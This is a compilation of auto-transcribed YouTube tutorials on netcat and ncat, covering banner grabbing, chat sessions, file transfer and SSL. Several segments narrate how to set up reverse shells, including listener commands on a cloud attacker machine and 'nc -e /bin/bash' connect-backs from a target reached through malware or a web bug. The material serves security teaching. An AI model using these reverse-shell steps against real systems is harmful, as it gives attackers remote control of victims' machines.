213 on Port 80 now there's a connection there right it's not a big deal this is just a small tool um kind of just sat there and requested out that's kind of interesting I'm going to try it again in a second uh it's just like if I was on a web browser and I type www you know uh zon transfer. me or the IP address but here I'm using netcat so I'm going to try something I'm going to type a HTTP command my keyboard has been we'll get this try this again http/1.0 I apologize zero all right so what I'm going to be doing here is my computer established a connection with the port 80 on that zone transfer and now I'm just going to send it a very simple um HTTP command saying get the header and give it a second and it came back with some stuff all right uh not the stuff I'm looking for so I'm going to reestablish that connection it could have timed out could have been me waiting uh wasting too much time so let me try it again remember servers don't want to just sit there and and talk with people so I'm having some kind of connection issue didn't send a complete request in time well that's interesting and let's try it again so I think what's Happening Here unfortunately is there's there's some kind of timeout issue that this Zone transfer um doesn't want to communicate with me so I'm GNA try another server why not try another server uh since it's nmap I'm gonna say netcat and this time I'm not going to go after the IP address I'm just going to say www.nm.org and I'm going to communicate on Port 80 it's not an exact science these are real live machines going on here and I'm going to do my head space slpas http slash 1.0 and let's see what this brings us okay this brought up a little bit more information what I was kind of expecting from Zone transfer um it basically I kind of determine the operating system of uh nm. or they apparently they are not operating system apparently they are running uh Sy house okay and they're running the Apache 2.4.6 server so I basically used enat for a little investigation a little bit of footprinting there's more I can do with this but obviously um don't want to spend too much time just kind of gathering this particular information so let's go back and talk to our friend Tokyo and Godzilla right clear Godzilla and let's go to Tokyo now with any of these tools any of these tools they could be used for good or they could be used for bad I've said this for for years I can take a butter knife it does a wonderful job spreading butter spreading peanut butter it's a great kitchen tool could I sharpen that butter knife and potentially hurt something absolutely so as we investigate these tools understand these tools have are multi-purpose and they can be used um for negative impact what I'm going to do here is um going to suspend reality just a little bit I'm going to open up what they call a reverse shell uh or maybe I'll call it a back door now let's use a collective imagination here I write some code I write a a malware a virus or something and then somehow I deliver it to a unsuspecting individual they launch it without realizing that it opens up a connection so um again suspending a little bit of reality here I'm not going to be sending viruses I'm not going to be sending code I'm going to go back over here to Tokyo clear my screen and I'm going to use use use ncat and this time I'm going to say listen on Port and uh so listen no not Port 80 I don't want Port 80 on Port 8888 right so listen on Port 888 but this time while you are listening here's where we kind of will introduce a a reverse shell or a back door or some kind of or execute a shell A bash shell all right so what this is going to do again we we use this imagination here that I sent this code somehow I sent this code to Tokyo to my Tokyo computer and somebody unsuspectingly launched this code right not realizing it so again you'll notice over here in the Tokyo server I got Endo Endo me and the server name is Tokyo and it's sitting there and waiting now I'm going to go back to Godzilla and with Godzilla I do my end map I discover a very interesting P 8888 uh there's something there maybe I can establish a communication with that I'm not going to go back and forth with the end map and stuff like that but this time I'm going to go over here on Godzilla and I'm going to say ncat and I'm going to just like I've done before I'm going to say 10.0.0 n on Port 8888 right so establish that connection on Port 888 eight and now I'm just sitting here but in my ethical hacking or in my hacking mind I am not sitting here I knew I sent out a reverse shell I sent out at bash I I sent out that code somebody opened it on Tokyo and now that code is running so in reality over here on Godzilla if I start typing things I'm actually using the Tokyo shell so if I was to say who am I you'll notice the who am I is giving the name of me over here so I'm over here in Godzilla I'm executing commands who am I it is showing me and end Aero over here there is a back door there is a reverse shell there is some kind of utility that I'm now using to establish that connection so anything I do while I'm in netcat if I do an LS it's actually doing this command it's a remote command over here on this machine over here you can see how this can get very very dangerous um again we suspend reality a little bit it's very easy for me to sit at a given machine and do you know type this command so we have to use that Collective imagination that somehow I created a piece of malware that I delivered to a unsuspecting victim and that unsuspecting victim launched that malware and now they have an open port so how do we how do we resolve it one we keep instructing our users not to open up any kind of links any kind of executables from their emails also I'm going to break out of this all right and you see it broke out of here I'm going to launch it again over here just so if I go back to Godzilla and I do an end map and I do it St and this time I again I I know just to save time as I'm doing my end Maps as I'm examining things I begin to start looking for unusual Port activity right so I see a port 8888 it's a TCP Port uh it's currently open why does that machine have that Port open right so um on our defensive side we are constantly scanning machines to make defensive side the white head hacker constantly scanning those machines to make sure that those machines don't have ports that don't need to be open all right just a little quick little video about endcap it's just another Network utility I hope you enjoyed it um little cultural Appropriations I I love uh love Tokyo been there a couple times love Japan love Godzilla so I I think it's a good homage to those two so a lot of little things with netcat a lot of videos up there if you're interested you can download it onto your machines you can play around with it uh and see some of utilities you can send emails with it uh you can open up email servers you can open up a pseudo web server with it so nice little powerful little tool that being said let's go and learn something

https://www.youtube.com/watch?v=UCvkJ028NMc
Ethical hacking 39 views · 2:45
Ethical Hacking course.
AI Summary

In this video, the presenter introduces "ncat," a versatile networking utility that is part of the Nmap project. Ncat allows users to read and write data across networks directly from the command line and supports both IPv4 and IPv6. It is often referred to as the "Swiss Army knife" of networking tools due to its wide range of functionalities. The video demonstrates basic commands and options for using ncat, including how to set it up to listen on specific ports and interact with other network applications. Overall, ncat is highlighted as a powerful tool for information gathering and network connectivity.

Transcript

welcome in this video we are going to learn and cat it's an information gathering tool in colonics in cat or net cat is a feature-packed networking utility which reads and writes data across networks from the command line and cat was written for the nmap project and his culmination of currently splintered family of metal carnations it is a design to be like a bill back in tool to instantly provide network connectivity to other applications and users and cat will not only work with IP v4 and v6 but provides a useful with virtually limitless number of potential users and cat is also known as Swiss Army knife we can write and get or NC while running the command options so don't be confused if I will use different names for n cat simply we can understand what netcat does it opens the connection between two motions and give back those streams let's open the terminal and type and cat space - edge we can see that in cat motion some point for eight basic usage of netcat and gapped options hostname port options taking a time assume seconds append m/s for millisecond is for second and four minutes and H for hours let's see the options - full use IP v4 only - six use ipv6 only - new if one half in UNIX awk use UNIX domain sockets only let's listing on any TCP or UDP port the loan to act as any server with n cat let me clear you some command option which were going to use here if an l option will help it work in listen mode - P often will mention which port to listen if n V option will make it interactive uncle an observer and a syntax is and cat - LV VP spaceport so let's type and cat space - LV VP space 25 here we can see that in cat version sunburn cool listening on 0.0.0.0 25 so that's it in this video on n cat in function caring tool thank you for Russian flu

https://www.youtube.com/watch?v=LDUs6Vvu1S4
Amatya Katyayan 308 views · 1:16
Ncat in Cyber security | Network Security Series - Lec 05 (With Notes) Tags: #cybersecurity #5Minutes #Engineering #neso ...
AI Summary

In this video, the presenter introduces ncat, which is the Nmap Project's version of netcat, highlighting its strong cross-platform support, including native compatibility with Windows. Ncat is part of the broader Nmap tool, a free and open-source utility primarily used for network discovery and security auditing, functioning as a port scanner. The video also teases the next topic, which will cover Cryptcat. Viewers are encouraged to like, subscribe, and share the video for more content.

Transcript

hello everyone in our previous videos we have covered the topics netcat and socat in today's video we'll be proceeding with our third topic that is ncat what exactly is ncat and cat is the nmap Project's version of netcat it is most notable for its well maintained cross-platform support both nmap the port scanner and ncat have native Windows support so what exactly is nmap if you are thinking here is the answer nmap is a free open source utility for network discovery and security auditing the network discovery and security auditing are the one of the two most users most useful features of nmap nmap is basically a port scanner okay we will be covering Crypt cat in our next video Until then thank you very much if you like the video you just saw please consider hitting the like button and letting us know also subscribe to our Channel and share the video with your friends stay awesome and see you next time [Music]

https://www.youtube.com/watch?v=cn9s-bnRrMU
CTF Security 728 views · 28:34
This video uncover two of the most widely used Ethical Hacking and Network administrator tool NCAT and NECAT WHAT ...
AI Summary

In this video tutorial, the presenter discusses two essential tools for network administration and ethical hacking: Netcat and Ncat. Both tools are versatile, often used for tasks like port scanning, banner grabbing, and file transfers, with Ncat being part of the Nmap project and offering additional features such as SSL support. The tutorial explains how to set up a listener and connect two machines using these tools, demonstrating a simple chat session between a Windows and a Linux machine. It also highlights the security vulnerabilities of using default TCP connections and suggests incorporating SSL to encrypt communications, making it harder for unauthorized users to intercept data. Overall, viewers are encouraged to explore the manual for detailed instructions and to practice using these tools for network tasks.

Transcript

hi everyone welcome to another video tutorial on computer tech forum today we'll be discussing about two of the most used network administrative and ethical hacking tools the net card and the ncac these two two are often referred to as the swiss army knife because of their versatility in network administration the netcat most of the time upgraded as nc was created by orbit in the year 1996 on the other hand entered was created by nmark as part of the nmap project both end cards and the netcat are network analysis tool used for accomplishing tags such as port scanning which involve scanning a target post for open port um banner grabbing which involves gathering useful uh reconnaissance information about target rules such as os types and other services available uh it can also be used in transferring files uh most network administrators instead of uh using the file transfer protocol the ftp or other techniques to transfer files uh prefer to use uh ncat or netcat which is based on the standard tcp and udp protocol in order for two or more machines to communicate or transfer files you will need to set up endcards or netcat in both listings and connecting mode so if this is the first time you are using the net card or end card uh you can go to the manual to view the uh manual instruction about how to use uh uh uh the netcat or the end card now i'm going to pinpoint uh some of the most uh essential flag or option once when it comes to uh the net card uh if you see the usage instruction here is our end card option hostname under port uh the endcard is the application in use the option is the flag here which we are going to choose and the host name is your target pc and the thought is uh used to specify which particular part you want your connection or you want your network to listen to listing on uh talking about some of the most important connections the very first one is the listing uh flag the list flag is used to bind and listen for incoming connection uh another one is the uh the port flag which is the p so we can call sometimes we call it the suspect this uh specified the source spots to use for the connection and uh we also have another important flag such as the u the new flag is used to uh tell and cut that you want to use the udp protocol instead of the default uh tcp protocol we also have another important flag such as the o flag which is used to dump session data to a file so if you are using end card for example uh let's say you are are are you created a chart session between uh two or more pc and you would like to get the output of this uh chart session into a file probably on the host uh computer or any of the communicating devices so you can use the uh the option to dump session data to the uh file so uh another uh important uh option here is the wait time so you could specify uh connect time out that is the time for the uh connection to be on uh till its disconnect uh so when you scroll down to the bottom of the page you can see uh some other functionality of the end card uh there are some functionality in the end card which are not supported by the netcat functionalities such as using the ssl uh the secured uh layer and also proxy is also not supported by any netcast these two uh connection types are not supported by netcat so we also have uh some other functionality such as um allow this is uh when i want to allow a setting whose ip address on the network we also have allow file the allow file is used to uh allow list of our post uh or ip address on the network we have deny this is usually used when you want to deny a particular ip for connecting to your uh connection you also have the deny file this is uh when you want to block these uh some list of some host or ip addresses from connecting to the network we have the chat session the chat session is supported both by the netcat and the endcard uh this is used to create a chat session in between two or more pieces uh this uses a simple end card chat server so one of the pcd uh pc that listing for connection becomes the uh the host of the chat session while other pc connected uh become decline during connection uh information broadcasted by the host by the host which is the chat server is going to be visible to every client on the network uh while the information sent uh within uh by client will not be visible to the uh chart server uh enough about the uh manual page let's get to business so now i'm going to show you how you can uh create a listener so i'll go to my window machine okay this is just one so open another one so you actually use one for the connection i use one to check for my ip address so i'm going to use the ip config check for the ip address so you can see this is my default k3 and this is the ip address of my windows machine so i'm going to copy this id address first so i will create a connection with this i will say end cards listening on them with bubbles on port 1 2 3 4 and uh enter so this creates a listener on any which is indicating 0.0.0 uh one two three four this is default this is indicating that any ip address can connect to this uh to this network and so i will go to my window and to the linux machine uh to connect to this uh particular network we just created so i'll go to the linux machine so i'll use the sudo uh and cards the ipa address of the host which is the app address of the system that created the networks of phases and the port is spot one two three four the same thought so so let's look if there's a connection between the two pc so we'll go back here so let's try to send a message from here so let's say hello okay we have our connection right here so we have as you can see connection from 192.168.43.49 which is the kali uh the kali uh ip address so to confirm this i will put another terminal so i can just say ipa to leave the episode you can see this is the ip address of the kali machine 192.168.43.49 uh so i'll go back to the window mention so we have a connection on this port so now uh let's try to send a message to see if the linux machine uh receive this message hello i am going to so we send that and then check our virtual machine if it saw that okay group we have loi on the window machine and under let's try to reply and see if the window machine receive uh this message okay so let's go back and see if the window machine is able to see this mesh okay as you can see see see okay i am calling it so we have these two nations talking to each other this is a simple illustration of how you can create the communication between uh uh uh to mention now we've seen how we can create a connection uh within two uh machine uh so the problem of this uh default connection in uh endcard is that this connection we just created is not secure that is anyone who is able to uh capture the data package between uh these two uh machine can be able to uh find out the communication between these two machines so let's try to see how this can be done so okay so we can launch our wireshark so let's go to my wireshark i think i use it recently why i shall go so i'll open the wireshark machine i'll give it a password okay so what we actually want to do now is uh we want to capture the communication between the window machine and the uh kali machine to see if we can actually uh figure out uh the communication between our theme so what we're going to do is uh okay now wait for that to come up so when it load up we have to select the ethernet 0 okay and wait for our wireshark to start capturing okay the wireshark have started capturing so i can go back so let's try to continue our communication so i could say um okay i just send this let's see if our window is still communicating okay i think this should take a little bit time so i'm waiting for the message to drop okay yeah so yes all right so we have the two machines to uh communicating so let's go back to our wireshark and try to filter for the tcp so select the tcp okay we have our tcp so i'll pick this connection and uh follow the tcp stream so you can see the connection between uh these uh two systems so anybody which is able to capture the data package will be able to find out uh what has been going on between the two uh pc so that is where uh the ssl company i've seen um how insecure the uh default tcp connection of our end card is so what we're going to try to do is we're going to try to incorporate the uh ssl uh functionality into our connection and try to see if we can encrypt uh the the chart so that uh even when the packet capture our information remains hidden so what i'm going to do now is i'm going to create a new connection this time using the kali machine at the host so what i need to do is now use a copy i'll say sudo and card listen verbose okay so we have our ports listening so you can see the information generating a temporary uh 2048 rsa key uh so this is our fingerprint the sha one fingerprint you can see it here and we're listening on port one two three four under any uh post so under any host name so what we're going to do now is uh try to connect uh using the uh window pc uh so i'm going to say end card the ip address of my kali uh which is uh 192. 168.43.49 so unfold one two three four so we have a connection from uh my window machine uh to on the kali machine so the two machines are in connection right now so what i'm going to do now is uh before initiating uh my child i'm going to capture so i will go to wireshark going to wireshark so supply the password password uh and wait for wireshark to load up so we are going to be capturing again so i'll select the zero double click on it and make sure your wireshark is capturing so now i can go back and communicate hello i am okay so let's see if the machine uh is receiving the connection we wait sometime it takes a little bit of time eventually to come okay let me try to reply and see okay we have a problem and the existing connection was what was closed by the muscles so let me specify the ssl we have another connection so hello okay hello and this also okay good so now we have uh the connection uh the issue was uh while connecting i didn't specify the ssl so that is the problem we are having before so i'll just close this uh for better understanding so i'll close this play and i'll try to communicate again i'll play this and i'll make sure this is closed so i'll also this okay cnn so i'll create it again so we're having um then we have the ssl so we have created listener so we go to the window to connect so we use our end card the ip address 192.1 ssl okay we have another connection so if we communicate hello so let's see if the window machine can hear that okay yeah okay we have the message hello are you there okay we're glad yes yes yes so we have two communication between the two systems so now we're going to go back to our capturing to see if our messages are secure so i'll filter by uh tcp so i'll go to my capture data on the 49 the ip address 49 will use the follow tcp stream and see can you see how the messages are encrypted so we can hardly find a meaningful information from an interface like this so this is the power of the ssl functionality in the end cap we're going to create a chat server between our three different uh uh we have uh two linux machine right here and we have our window machine our window machine is going to be serving as the the the uh host computer then uh we're going to try to dump the chat session between the client and the host into the host system um we also are going to specify the key option uh because uh we want more than one uh pc to connect to our network so what we're going to do right now is uh we are going to confirm the ip address of the host first so this gives us the ip address of the host so i'm going to just copy this control c um then uh i'll start the listing up from the host using uh end card uh the bubbles then the bubbles one two three four then i'll specify uh i want to charge session and then i'll specify i want my chat session to be saved into a file called chat session dot txt so all we need to do now is uh connect uh from the different clients using the same idea that we just copied from the host so i'll use um sudo and card i'll paste the ip address and uh one two three four which is the port number and uh enter make a connection then i'll go to the second pc i have netcast i don't have encounter so i'll use the end card command sudo sc 192.416. 106 on our port one two three four okay let's go back to the host and see if we have a connection okay the connection is depending so we wait okay nice we have a connection you can see see see right on the ipad there's 192.168.3.9 uh we have another connection from one f2 that one is the 43.79 uh which is this machine and the 49 is this uh machine so let's try to see if there's a connection uh uh uh by trying to broadcast the message from the host so i'll broadcast the message from the host hello okay good we have uh both parties uh received message you can see hello from uh uh uh uh this machine and you can see the yellow from this machine can also see the yellow from this uh uh machine so let's try to reply all right okay good we have hi broadcaster to this machine uh okay so now that we have our communication between uh the different machine uh what we're going to do now is uh we're going to try uh terminate uh the listener and see if our file gets dumped into the chat session stuff yet so i'll just uh control c i'm having okay this is also terminated okay we have the host also terminated so i'm going to bi out into this directory to view our chat uh session file so let's try to screw chat sessions okay we have our chat session file so let's try to open that using a notepad so i'll say most part okay good so we have uh we have the chat session right here you can see uh the first one from user356 uh already connected nobody so this is when the first is actually connected and there were no other user in on the chat so we have another user 39 uh 396 also connected and we have the first broadcast from the server hello client and we also have the first reply from the ip from one of the system and okay we have the first reply for one and we also have another our reply from uh uh uh one of the system this is how our charts get dumped into a file and save down so what i'm going to demonstrate next is uh i'm going to show you how we can send uh these documents we just created uh in the host uh chat server into uh one of the uh client system so i'm going to use uh first of all you need to confirm what the ip address of the host is once again okay so this is the ip address that we used to connect from this line so to send this document i'll use the dir to view the document name once again so i'm sending the chat sessions this one chat sessions.txt so i'll specify and type listing bubble spot one two three four uh then uh okay let them uh the file name chat session okay so i have my listener so now i will go back to the client machine which i want to send my file to and say sudo and type enter the ip address of the sender then greater than any name i would like to call the file so let's call it uh ctf security we have connection refuse okay connection refuse is our fault correct okay good we didn't specify default so i'll go back one two three four under do we have a connection from uh the host and uh if we terminate this let me terminate this okay let me figure out so you can see the terminate this only we can see our file right here then to confirm we can cut our ctf of security fps okay it's right here you will have all the information within it so if you are not okay using the cast command you can open it with any of your uh notes files so i'll say uh have looked installed [Music] so we have our chat session so i hope you like this video please do subscribe and don't forget to click on the notification button to get a lot anytime we uploaded thank you

https://www.youtube.com/watch?v=cOqkGW56x0U
Mark McNally 866 views · 4:59
Netcat is a giga useful tool for anything networking. In this video we are going to be looking at just a few small ways this tool can ...
AI Summary

The video discusses the powerful networking tool Netcat, often referred to as "the god tier of networking tools," which is essential for Linux and network engineers. It demonstrates how to install and use Netcat for various purposes, such as creating a simple chat room between two terminals and transferring files between systems. The presenter also explains how Netcat can be used for more advanced tasks, including setting up a reverse shell to gain access to a remote system, highlighting its potential for both legitimate and malicious uses. Viewers are encouraged to explore Netcat's capabilities while being aware of its implications in cybersecurity.

Transcript

during the most useful commands on Linux for anything Network related they all know how to hack people with a reverse shell with one line of code you can get access to their entire system do you want to know how to do that we've probably come to the right place we're going to be talking about netcat the god tier of networking tools it should be a tool that every self-respecting Linux slash network engineer knows about and you're going to learn about today let's jump right into it shall we so I've got two terminals open here this is my Plex server this is my desktop first of all install netcat it's probably on your distribution called that cat like this and can't like this or just NC that cat is always called NC these are different distributions so you can see that this one is actually using ncat which is a different implementation but they all work the same you can listen to any port using that cat so NC netcat L for listen and then you just put the port in so I'll put 9001 because funny number enter nothing huh but it has an exited we can now connect to that port on our desktop we can go NC the IP of that server or I'll just put the hostname in so Plex then the same port we are now connected so now if I type hello This Server sees hello and if I type hi there it comes up here so we now got a little chat room going oops I just quit it because I press quit but we had a little chat room going ah connection reviews because I need to listen first so yeah we got a little chat room hello hi so obviously these servers could be the other side of the world and now we have basic chatting there we go who needs IRC who needs Discord who needs Mumble and when you've got that cat right mainly it could use some enhanced features but it's good if you used um Linux before you know what cell redirects are where you can send files somewhere to a different shell to a different stream you can stream data to a different program with pipes but we're going to use redirects here so I have I have this file here called file.text this file is to be transferred yeah [Music] um I'm sorry so we can also use this as netcat as a giga simple file transfer program what's it can do more than just a chat room here hell yeah brother NC Dash l and then just send the file in there file.text there we go okay need to put the port in Mark there we are and now I can connect to that what do you think is going to happen NC Plex 9001. we get the file there we go look at that but I mean it's now a chat room again so we've got the file and the chat room but we just want it's not a chattering by the way it's just Network traffic but I'm saying it's a chat room all right um but let me just clear these so we start this the same way send the file in right and then with this one instead of just running like this we also want to send that to a file so we want to send that to file dot text like this there we go and there we have file.tax there with the file in it there we are so now we can also you can also do simple file transfers with it what what can't you do with this you can't hack people oh wait yes you can so let's imagine that Plex this this this server here plaques is my attack box it lives on the internet okay so it can get connections from anywhere so people can reach out and talk to it through means of a nefarious script in some open source code which I'll never do I I will I have snuck some code on to my desktop that gets it to run a certain command so on This Server I'm just listening for incoming connections but then on This Server I either threw a back door and want to do more through my back door so if I can only exploit let's say through some weird PHP bug I've gotten through a web server and I can only run one command at a time but I want to get a full shell I do it like this so I'd set up a command server I listen like this and then on This Server if I can only run one command that cat the server the port and then Dash e for execute and then we just want to execute bash like this now I'm here look I can type LS and I've got it I can type who and these are commands running on here I could type notify hyphen send I am here and it pops up on my desktop I am here keep in mind This Server completely different location it's not even in my my house right so I it's just quite cool we got reverse shell here and what's more is I'm not going to show you today but you can even if for example your target doesn't have netcat installed you can still send what netcat is doing here to this and and there you go that's how a simple uh you can only run one command but then you get kicked out of the vulnerability can actually be way more than that uh you can get full reverse cell I've got that there you go um LS ah here why you how are you here in those you're there that's netcat Basics uh subscribe or I'll reverse sell you and send you cheeky notifications on your desktop

https://www.youtube.com/watch?v=l9LQEHYr3AI
Netizen Watch 83 views · 5:58
Welcome to another episode of the "Break Into Security: Is It Broken?" podcast with your host, Akyl "Ambition" Phillips.
AI Summary

In this episode of the "Break Into Security" podcast, host Akil Phillips discusses essential hacking tools known as the "Swiss Army knives" of cybersecurity: Netcat, Ncat, and Nmap. He explains that Netcat, introduced in 1995, and its successor Ncat, which comes with Nmap, offer similar functionalities for tasks like file transfer, remote access, and data encryption. Nmap, created in 1997, enhances these capabilities with network mapping and scripting features, making it a vital tool for penetration testers and network engineers. Phillips emphasizes the importance of mastering these tools for anyone looking to enter the cybersecurity field and provides links to resources such as an Nmap guide and a Netcat cheat sheet for further learning.

Transcript

I'm finna put all this in my book bag cause I'm from the streets yeah yeah boom what's going on it's your boy Akil ambition Phillips and welcome to another episode of the break into security is it broken podcast today we're talking about these Swiss Army knives of hacking now I say knives because there's actually more than one you can see on the screen we talk are actually on our chart board we're talking about netcat that says netcat right there uh which came around in October of 1995 then the year after that we got ncat which uh has the same functionality but it's not coded with any of the same source code now right after that you have something called the nmap which is short for a network mapper now this was the uh created by Gordon Lyons and uh it came around in 1997 and it turns out that ncat which is actually come uh comes along with the base install of the nmap is actually meant to be packaged with nmap so it was actually designed for that purpose so let's go ahead and talk about what you can do with these tools ncat or ncat and netcat right the command line utility for netcat being NC right so if you go to your Linux commands type in NC space Tech L uh space Tech p uh port number and then uh forward slash or actually space uh attack e forward slash bin forward slash bash I'll go ahead and make sure there's a link to that in the uh description but if you go ahead and check this out what you're gonna find is that you can open up a netcat listener now that command that I just gave you guys is actually one of the default commands that you see a lot when you're learning any sort of hacking certification when they want to teach you about something called a remote access Trojan so the foundation of which that we've been teaching for over 30 years now uh comes from netcat so what can netcat do and keep in mind a lot of the same functionality is in ncat so netcat MCAT we could actually use these interchangeably uh transfer files you can definitely transfer files with netcat and ncat you can also download files so that's going to be a hit on your data exfiltration you also have the ability to encrypt uh uh your encrypt your data transfer if you layer it with the open SSL toolkit so you can actually go ahead and use the open SSL toolkit what else do we have here we have uh Banner grabbing right so Banner grabbing is another utility of the Tool uh we have a live Drive cloning what I mean by live Drive cloning it is you can actually initiate a remote connection jump in find your SDA your SDC or your sdb if you're familiar with Linux you understand what that means uh those are actually the designators for your hard drives and you can initiate a clone of that drive remotely right you also have a remote and reverse shells both can be done with ncat and netcat now why am I telling you this because if you are a penetration tester and you want to use netcat and you're using a Linux machine the NC is going to be there but if you're then logging into a Windows machine you may not have that command line utility now if you targeted an administrator's machine or a network Engineers machine any one of the engineering Suites that might have uh nmap installed on it then boom you get access to netcat which gives you all of the same utilities now how does this make nmap a part of the Swiss Army knives we know that uh ncat and uh and uh man is getting complicated MCAT and netcat we know that they share functionality they're literally the same uh just a uh a subject of refactoring if you will and refactoring means to recode something uh just making sure that it keeps the same field and netcat and ncat do that actually very well so what does nmap have to do with the uh the Swiss Army knives analogy well we add in network mapping OS detection and scripting once we get into nmap see nmap is coded in C uh I would believe C plus plus and it also has additions for Python and Lua right so Lua being one of the fastest coding languages in the world that came out of Brazil and python obviously the default uh go-to language for a lot of security Engineers today so with nmap you can go ahead and get scripting involved but you can keep all of the functionality that we've picked up from all of our Network Swiss Army tools of the past this is what makes netcat ncat and nmap a need to know tool it's a need to know resource for any network engineer security engineer or any uh aspiring pen tester you definitely want to make sure you dig into the uh pile the iceberg if you will on those right if you guys check the description I'm definitely going to have uh a link to the nmap guide which is pretty much the same thing that you get with the nmap book uh just online I'll also make sure that there is a uh cheat sheet for netcat you definitely want to check out this cheat sheet it's going to give you a better idea of what we mean when we say Swiss Army tools now if you are still someone that is trying to break into the industry remember you're going to want to make sure that you step into the door understanding how to use these Swiss Army knives of network security of system security and hacking until the next episode I'll see you guys later [Music] um

https://www.youtube.com/watch?v=vUE3E2BSPiU
NetworkChuck 2.8M views · 20:08
Protect your grandma from RATS: https://bit.ly/bdnetworkchuck (try Bitdefender for FREE for 120 days) Links and Guide: ...
AI Summary

In this video, the host introduces Netcat, a powerful tool used for gaining remote access to computers, specifically through a method known as a reverse shell. A reverse shell allows a target machine to connect back to an attacker’s machine, bypassing firewall restrictions that typically block incoming connections. The host demonstrates how to set up a reverse shell on both Linux and Windows systems using Netcat, explaining the necessary commands and configurations. Additionally, he showcases a hacking device called the Land Turtle, which can be plugged into a network for remote access. The video emphasizes that this information is for educational purposes only and encourages viewers to practice on their own networks to develop ethical hacking skills.

Transcript

net cat or netcat it's a tool we can use to gain remote access to our hacking targets and look at that yes it worked it's amazing in this video i'm gonna show you how to do it i'm gonna show you what netcat is and how we can use it to gain a reverse shell on linux and windows machines so this is scary dude and also what the junk is a reverse shell we'll talk about that and bonus check this out we're going to play with this guy it's a land turtle from hack five it's a wicked awesome hacking device that we can use just to plug into a network just plug it in walk away and we have remote access also do you want one of these i'm going to give away two of these in this video stick around till the end and i'll tell you how to enter the contest and as always when i'm showing you these hacking tools this is for educational purposes only you do not have permission to hack anyone for any reason so just don't do it it it but i do want you to try this on yourself i want you to try it on your own home network why well because it's fun and it's also a skill that you need if you want to become an ethical hacker a pen tester or whatever and it's something you'll use on ctfs on try hack me hack the box all the time so you got to know how to do this and shout out to bitdefender for sponsoring this video we'll talk more about them here in a bit but first let's start hacking but hold on what do we need for hacking we need coffee don't we let's go get some coffee [Music] all right got my coffee let's start hacking oh and also have you hacked the youtube algorithm today let's make sure you do hit that like button comment notification bell all that youtube stuff let's hack youtube today ethically of course okay apart from coffee what else do you need to actually walk through this hack let me show you the first thing you'll need is a target system which will actually be you it'll be a computer in your home network now ideally you're going to have a linux computer and a windows computer so we can have fun and test both and they don't have to be physical computers they can be virtual machines and if you have no idea what those are or how to set those up i got a video right here check it out now for this you'll want a computer outside of your home network how do you do that the cloud man that's the easiest way to do it for that you do have a ton of options but i'm going to walk you through one of my favorite cloud providers lenode and if you use my code network chuck when you first sign up you'll get 100 free credit so this should be free for you okay first let's talk about what we're doing because i said we're getting remote access into a computer and we're going to be using something called a reverse shell but what does that mean here is our hacking target and your hacking target is going to be again inside your home network and keeping in mind for the most part the home network is keeping your target safe because in most cases you have a router in your home network right and built into that router is a firewall and it makes it pretty hard for us hackers to attack anything inside that network remember our goal here is to remotely access our target when i say access i mean i want to be able to log in to like a command line a shell and enter commands and do stuff that's the ultimate goal but again the firewall will block most connections trying to come in to your home network protecting your target and the same thing does apply to most enterprise networks we can't get in because the firewall blocks things so since we can't connect to our target and access his shell what if we had our target connect to us what yeah that's what a reverse shell is where instead of us trying to connect to him he connects to us but how do we do that and why why are we doing that well first start with why are we doing it and we'll get to how we do it yes the firewall is blocking most inbound connections blocking us but you know what he's not blocking he's not blocking connections going out or most of them anyway so for example when our target wants to visit a website the firewall's like yeah man come on through you're good you're trusted you're coming from inside the network so if we could get our target to connect to us that connection shouldn't be blocked okay sounds cool in theory but chuck how do we do that netcat that's how we do it check it out it's really cool now netcat is not a new tool it's been around for a long time and it's not just used for hacking it's often called the swiss army network knife something right no what's it called oh the network swiss army knife yeah that's what they call it networking system admins often use this to scan networks similar to nmap you can transfer files and do some cool stuff like it's a powerful tool but the most popular use is for reverse shells so let's make this happen here's our first scenario our target will be a linux system the attacking machine will be our cloud machine which i'm going to set up on lenode this actually won't change this will be the same thing for all scenarios so let's go set up lenode so navigate to lenode.com or check that link in the description and get you an account or just sign in once you're in i'm going to click on create at the top left here and lenode it's basically a virtual machine and the cloud if you're not familiar with this now for this we won't need much i want to change my distribution to ubuntu 18. it's just one of my favorites i like it 1804 there we go it's like my region by plan i'll make the smallest one one gig it's only five dollars a month that's awesome and again if you have the 100 free credit it's free anyways i will name it put in my password and click on create that wasn't so bad right like the sucker's ready well almost it's provisioning so perfect time for a coffee break i know i'm drinking espresso totally out of character for me but it's good okay my machine is running because it says it right there i'm gonna copy my ssh access right here i'm going to launch my terminal it's going to launch cmd on windows and i will get logged in ssh at the ip now the beautiful part about netcat is that it's installed on most linux distros by default so if we try to use it real quick the command will be nc just typing in nc it's already installed so i have to worry about that now i didn't mention this before but for our attack right now on this scenario we will need netcat installed on both the attacking system and the target system but since we have a linux machine attacking a linux machine they should both have netcat and in my situation i have kali linux as my target which is flipping the script a bit take that cali anyways now again because this is a reverse shell things are a bit backwards as the attacker we're not going to attempt to connect anything we're actually going to wait for a connection to to to us but we have to wait we have to listen and that's our first task we're going to set up a listener we're going to use a netcat command that basically says hey we're listening for a connection for anyone to come here and we're going to specify a certain port that we're listening on let's try it out real quick it's very very simple too the command will be nc for netcat and we're going to use a few switches here a few options so i'll hit dash or tac l n v p l is for listening hey can you hear me that's the mode we're putting that cat cat cat in actually the l should be lower case case sensitivity is very important in linux n is for no dns we're only using ip addresses v is for verbose we're telling netcat whatever happens tell us everything that's happening don't hold back and then p is for port which we're gonna specify right after that switch so let's do it right now now here it can really be any port you want but your best bet to avoid any firewall detection is to keep it under the 1000 well-known ports or keep it under a thousand for me i'm going to try out using port 87. now in most cases this would be it that's all you have to do but for our lenode box here it does have quite a few interfaces so we have to tell it which interface to actually do this on so that will specify the ip address so we'll do dash or tick s for source and then the ip address of our box here and we just connected to that so we should already know it but i forgot it so i'm going to go to my lenode and copy it paste it in there and that's it so we're going to do here watch we'll hit enter and he's listening he's ready he's like uh what was that did you you say anything he's waiting he's waiting so now we have to get our target to actually connect to us let's try that here i'm going to be using my kali linux machine voldemort he who must not be named here the command will be nc and then we'll do tack or switch e now i will say the dash e option isn't available on most linux distros this is what's referred to as the traditional version of netcat and i found that dash e doesn't exist anywhere it's kind of considered an insecure thing which makes sense but we're going to use dash e to specify our shell we're going to use so or the shell i'm offering to my attacker here attack me it'll be forward slash bin forward slash bash so if you're using cali or something similar this should work great if it doesn't just don't use the dash e switch you should be fine and then the ip address i'm gonna paste that this is the ip address of the attacker our cloud machine and then the port that we set earlier port 87 and we're going to hit enter this is it this is it ready go what happened nothing happened here we have to go look at our other machine here and look at that yes it worked ah yes connection from our home network the victim has successfully connected to the attacker we tricked him but how do we use it what's it look like 